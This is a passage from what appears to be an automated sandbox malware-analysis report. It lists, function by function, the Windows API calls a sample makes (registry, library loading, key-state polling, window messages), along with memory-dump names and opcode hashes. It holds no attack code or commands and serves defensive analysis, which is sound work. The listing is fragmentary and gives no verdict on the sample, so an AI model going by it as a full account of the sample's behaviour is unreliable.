                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2364364464-0
                                                                                                                              • Opcode ID: c7dc4e455c55e3e89474d7024723feece320c6aca66860eba3caf109f91af734
                                                                                                                              • Instruction ID: cb045a82e3e58bd7cce0dc47929a6a59705950a2b513f52e72cad4743e2c99c2
                                                                                                                              • Opcode Fuzzy Hash: c7dc4e455c55e3e89474d7024723feece320c6aca66860eba3caf109f91af734
                                                                                                                              • Instruction Fuzzy Hash: A3815071A40215BFDB14EF64C886BADBBF9AF44720F158059F909AF382D7B4A9418F90
                                                                                                                              Function 001D0579 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001784A6: __swprintf.LIBCMT ref: 001784E5
                                                                                                                                • Part of subcall function 001784A6: __itow.LIBCMT ref: 00178519
                                                                                                                              • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 001D05DF
                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 001D066E
                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 001D068C
                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 001D06D2
                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000004), ref: 001D06EC
                                                                                                                                • Part of subcall function 0018F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,001BAEA5,?,?,00000000,00000008), ref: 0018F282
                                                                                                                                • Part of subcall function 0018F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,001BAEA5,?,?,00000000,00000008), ref: 0018F2A6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 327935632-0
                                                                                                                              • Opcode ID: 08241e38083c69309918a0ea339340b53fb66d6dbf905653f10c3e5f797fbc42
                                                                                                                              • Instruction ID: 6a1b37632633d80e99878964bbfd80fe5e5a4445f9f19a6b6e25701224000d27
                                                                                                                              • Opcode Fuzzy Hash: 08241e38083c69309918a0ea339340b53fb66d6dbf905653f10c3e5f797fbc42
                                                                                                                              • Instruction Fuzzy Hash: 0F516975A002059FCB01EFA8C495AEDB7B5FF58310F14C06AE95AAB352DB30ED45CB91
                                                                                                                              Function 001D2D1A Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                                • Part of subcall function 001D3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001D2AA6,?,?), ref: 001D3B0E
                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001D2DE0
                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001D2E1F
                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 001D2E66
                                                                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 001D2E92
                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 001D2E9F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3440857362-0
                                                                                                                              • Opcode ID: 18f4c276f03613238bf3e79a479116c15c85cd90d24684ab6d6c475a49983eba
                                                                                                                              • Instruction ID: 8396a33496779bbe1213c00daacd9e2078b96befc50ab3c475664477f9b01cd4
                                                                                                                              • Opcode Fuzzy Hash: 18f4c276f03613238bf3e79a479116c15c85cd90d24684ab6d6c475a49983eba
                                                                                                                              • Instruction Fuzzy Hash: B1515C71204205AFC705EF64C881E6BB7F9FFA8304F14891EF595872A1EB71E945CB52
                                                                                                                              Function 001DCB07 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5806d79a773fe39f8f27935e5dac7883888fa4cdcffe72d803bbb84c3b9c4b9e
                                                                                                                              • Instruction ID: 343fe139fc1e39dfd79bcb0ac2793db0f6f023a45f3ef36d23b90959bdf51bfc
                                                                                                                              • Opcode Fuzzy Hash: 5806d79a773fe39f8f27935e5dac7883888fa4cdcffe72d803bbb84c3b9c4b9e
                                                                                                                              • Instruction Fuzzy Hash: AA410135900106AFDB24DB68DC49FA9BB6AAB09360F154A67E919A73E0C730ED41DA90
                                                                                                                              Function 001C1726 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 001C17D4
                                                                                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 001C17FD
                                                                                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 001C183C
                                                                                                                                • Part of subcall function 001784A6: __swprintf.LIBCMT ref: 001784E5
                                                                                                                                • Part of subcall function 001784A6: __itow.LIBCMT ref: 00178519
                                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 001C1861
                                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 001C1869
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1389676194-0
                                                                                                                              • Opcode ID: 44473e994c7890d149d75300994a39ecfa6b94e2b422274f3139fb0061c93854
                                                                                                                              • Instruction ID: 397b03aec5a7b82c27722311d6f17745e3ab224ca082a8df3aee2cb5b4d0c4d1
                                                                                                                              • Opcode Fuzzy Hash: 44473e994c7890d149d75300994a39ecfa6b94e2b422274f3139fb0061c93854
                                                                                                                              • Instruction Fuzzy Hash: 1E411C35A00205EFCB11EF64C985EADBBF5EF58310B14C099E80AAB362DB71ED51DB91
                                                                                                                              Function 0018B736 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetCursorPos.USER32(000000FF), ref: 0018B749
                                                                                                                              • ScreenToClient.USER32(00000000,000000FF), ref: 0018B766
                                                                                                                              • GetAsyncKeyState.USER32(00000001), ref: 0018B78B
                                                                                                                              • GetAsyncKeyState.USER32(00000002), ref: 0018B799
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AsyncState$ClientCursorScreen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4210589936-0
                                                                                                                              • Opcode ID: de415fb25b0e0f4fcbadfab616424849ac9b418bbf9c8ad7664adaeb42615228
                                                                                                                              • Instruction ID: 6482624a086cf3c66b672cefb46d1df44aa9fd95bf2d0b4507f28a29658a987e
                                                                                                                              • Opcode Fuzzy Hash: de415fb25b0e0f4fcbadfab616424849ac9b418bbf9c8ad7664adaeb42615228
                                                                                                                              • Instruction Fuzzy Hash: FD415F35508659FFDF199F65C884AEDBBB5BB45364F10431AF829922E0C730AA90DFA0
                                                                                                                              Function 001AC145 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 001AC156
                                                                                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 001AC200
                                                                                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 001AC208
                                                                                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 001AC216
                                                                                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 001AC21E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostSleep$RectWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3382505437-0
                                                                                                                              • Opcode ID: 3486d25abbc39fa87d8a04574a05c256db92cf6c0c317378ae21d4f83a8c1b8c
                                                                                                                              • Instruction ID: c89e005454b9aaf4f9fee22d6a6f28e191be511fa8df22f3ad3dcba28e92d891
                                                                                                                              • Opcode Fuzzy Hash: 3486d25abbc39fa87d8a04574a05c256db92cf6c0c317378ae21d4f83a8c1b8c
                                                                                                                              • Instruction Fuzzy Hash: 6B31E175600219EBDF04CFA8DD4CAAE3BB6EB05325F114229F820EB2D1C7B09954CB90
                                                                                                                              Function 001AE9B5 Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • IsWindowVisible.USER32(?), ref: 001AE9CD
                                                                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 001AE9EA
                                                                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 001AEA22
                                                                                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 001AEA48
                                                                                                                              • _wcsstr.LIBCMT ref: 001AEA52
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3902887630-0
                                                                                                                              • Opcode ID: 24867ded04ad41c964d290f2a3fc59f6f12e05cc646bc4630fa966245fc31ade
                                                                                                                              • Instruction ID: 3f0556bfe364142c286b387a047340944052d46dfd73afe9b89330d39bda5b56
                                                                                                                              • Opcode Fuzzy Hash: 24867ded04ad41c964d290f2a3fc59f6f12e05cc646bc4630fa966245fc31ade
                                                                                                                              • Instruction Fuzzy Hash: C021F976204200BEEB159B69EC45E7F7BEDDF4A760F108039F809CB191DB71DC409650
                                                                                                                              Function 001DDC79 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 001DDCC0
                                                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 001DDCE4
                                                                                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 001DDCFC
                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 001DDD24
                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,001C407D,00000000), ref: 001DDD42
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Long$MetricsSystem
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2294984445-0
                                                                                                                              • Opcode ID: 093a5bf43b0cf3682928e574d8aa5b1b4d93a0caa435b75099d1133164fa3b76
                                                                                                                              • Instruction ID: 6e502cca988b617010bcb0eaed2c93fcab2e2b09707d164dd1973d8b5574a1d5
                                                                                                                              • Opcode Fuzzy Hash: 093a5bf43b0cf3682928e574d8aa5b1b4d93a0caa435b75099d1133164fa3b76
                                                                                                                              • Instruction Fuzzy Hash: 9D21CF71614622AFCF205FB9AC48B7A37A6FB45365F11072AF926C66E0D7709860CB90
                                                                                                                              Function 001ACA6D Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001ACA86
                                                                                                                                • Part of subcall function 00177E53: _memmove.LIBCMT ref: 00177EB9
                                                                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001ACAB8
                                                                                                                              • __itow.LIBCMT ref: 001ACAD0
                                                                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001ACAF6
                                                                                                                              • __itow.LIBCMT ref: 001ACB07
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$__itow$_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2983881199-0
                                                                                                                              • Opcode ID: 83b319a172e94426ebd02999951564eb10129479978d4e6df18e49b8b164dd69
                                                                                                                              • Instruction ID: 6ac3e37b8e821baa1c6b69baef4a7beb07dcd27d7785a9ed93d5dfa19de895d4
                                                                                                                              • Opcode Fuzzy Hash: 83b319a172e94426ebd02999951564eb10129479978d4e6df18e49b8b164dd69
                                                                                                                              • Instruction Fuzzy Hash: 1221D87A7002147BDB21EAA49C47FEE7AA9AF5E750F104024FD05E7281E7718D4587F0
                                                                                                                              Function 001C89AD Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • IsWindow.USER32(00000000), ref: 001C89CE
                                                                                                                              • GetForegroundWindow.USER32 ref: 001C89E5
                                                                                                                              • GetDC.USER32(00000000), ref: 001C8A21
                                                                                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 001C8A2D
                                                                                                                              • ReleaseDC.USER32(00000000,00000003), ref: 001C8A68
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$ForegroundPixelRelease
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4156661090-0
                                                                                                                              • Opcode ID: 4224bdb9dcc7dd0c7a68f90ccb4de7b2f26f5945f6cb0817bf3bd0dfdd21c253
                                                                                                                              • Instruction ID: ba8a1fe2273b505f110a4f09df01bd15e3024524afd5bc0031baaf29630f5c62
                                                                                                                              • Opcode Fuzzy Hash: 4224bdb9dcc7dd0c7a68f90ccb4de7b2f26f5945f6cb0817bf3bd0dfdd21c253
                                                                                                                              • Instruction Fuzzy Hash: 32216F75A00200AFDB10EFA5D889AAA7BF5EF58315B048479E94AD7751CB70ED40CB90
                                                                                                                              Function 0018B58B Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0018B5EB
                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 0018B5FA
                                                                                                                              • BeginPath.GDI32(?), ref: 0018B611
                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 0018B63B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ObjectSelect$BeginCreatePath
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3225163088-0
                                                                                                                              • Opcode ID: 0b99312dd344aef058c780a4781f83e97c1ff4be8192fbd2768271b03d6e5f71
                                                                                                                              • Instruction ID: 82a11f450262e7238332612b14123c4c288aa26a8032cf3a10a2a293e93c1d57
                                                                                                                              • Opcode Fuzzy Hash: 0b99312dd344aef058c780a4781f83e97c1ff4be8192fbd2768271b03d6e5f71
                                                                                                                              • Instruction Fuzzy Hash: 03219D70904345EFEB10AF15FC8C7AABBE9FB10325F24412AF815921A0D3749AA1CF58
                                                                                                                              Function 00192E57 Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __calloc_crt.LIBCMT ref: 00192E81
                                                                                                                              • CreateThread.KERNEL32(?,?,00192FB7,00000000,?,?), ref: 00192EC5
                                                                                                                              • GetLastError.KERNEL32 ref: 00192ECF
                                                                                                                              • _free.LIBCMT ref: 00192ED8
                                                                                                                              • __dosmaperr.LIBCMT ref: 00192EE3
                                                                                                                                • Part of subcall function 0019889E: __getptd_noexit.LIBCMT ref: 0019889E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
